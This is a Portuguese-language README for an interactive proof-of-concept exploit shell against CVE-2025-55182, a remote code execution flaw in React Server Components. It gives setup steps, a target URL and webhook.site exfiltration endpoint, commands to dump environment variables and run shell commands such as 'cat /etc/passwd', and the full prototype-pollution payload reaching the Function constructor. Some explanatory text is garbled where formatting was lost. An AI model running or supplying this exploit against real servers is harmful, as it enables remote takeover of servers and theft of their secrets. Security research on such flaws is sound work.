CVE-2025-55182 PoC Interativo - React Server Components RCE - Pesquisa Educacional em Segurança
Shell interativo para explorar o CVE-2025-55182, uma vulnerabilidade de Execução Remota de Código em React Server Components.
Esta ferramenta é fornecida apenas para fins EDUCACIONAIS e de TESTES DE SEGURANÇA AUTORIZADOS.
O CVE-2025-55182 afeta React Server Components (RSC) em:
A vulnerabilidade permite Execução Remota de Código (RCE) através de payloads maliciosos enviados a Server Actions.
$@x para referenciar objetos Chunk internos.then() (semelhantes a Promise)_response, _formData e _prefixFunction através da travessia da cadeia de protótipos$3:constructor:constructor → Function constructor → RCE
git clone https://github.com/NathanJ60/react2shell-interactive.git
cd react2shell-interactive
npm install
Edite o exploit.js e atualize estes valores:
const TARGET_URL = 'http://localhost:3000/' // Vulnerable Next.js server
const WEBHOOK_URL = 'https://webhook.site/YOUR-ID' // Your webhook URL
Obtenha um webhook gratuito em: https://webhook.site
node exploit.js
| Command | Description |
|---|---|
!test | Testa se o exploit funciona (envia confirmação para o webhook) |
!env | Exfiltra variáveis de ambiente (process.env) |
!js <code> | Executa JavaScript personalizado |
!help | Mostra ajuda |
!exit | Sair |
<command> | Executa comando do shell (ex.: whoami, ls, cat /etc/passwd) |
react2shell> !test
[+] Sent! Check webhook
react2shell> whoami
[+] Sent: whoami
react2shell> ls -la
[+] Sent: ls -la
react2shell> !env
[+] Sent! Check webhook for env vars
Os resultados aparecem no seu webhook, não no terminal.
{
'0': '$1',
'1': {
'status': 'resolved_model',
'reason': 0,
'_response': '$4',
'value': '{"then":"$3:map","0":{"then":"$B3"},"length":1}',
'then': '$2:then'
},
'2': '$@3',
'3': [],
'4': {
'_prefix': '<JAVASCRIPT_CODE>//',
'_formData': { 'get': '$3:constructor:constructor' },
'_chunks': '$2:_response:_chunks'
}
}
next-action$@3 cria uma referência Chunk$3:constructor:constructor percorre até Function_prefix é passado para Function() e executadorequire() não está disponívelimport() dinâmico em vez disso:
import("child_process").then(cp => cp.execSync("whoami"))
Atualize para estas versões para corrigir a vulnerabilidade:
Licença MIT - Apenas para fins educacionais.
PoC de Pesquisa em Segurança - Use com responsabilidade.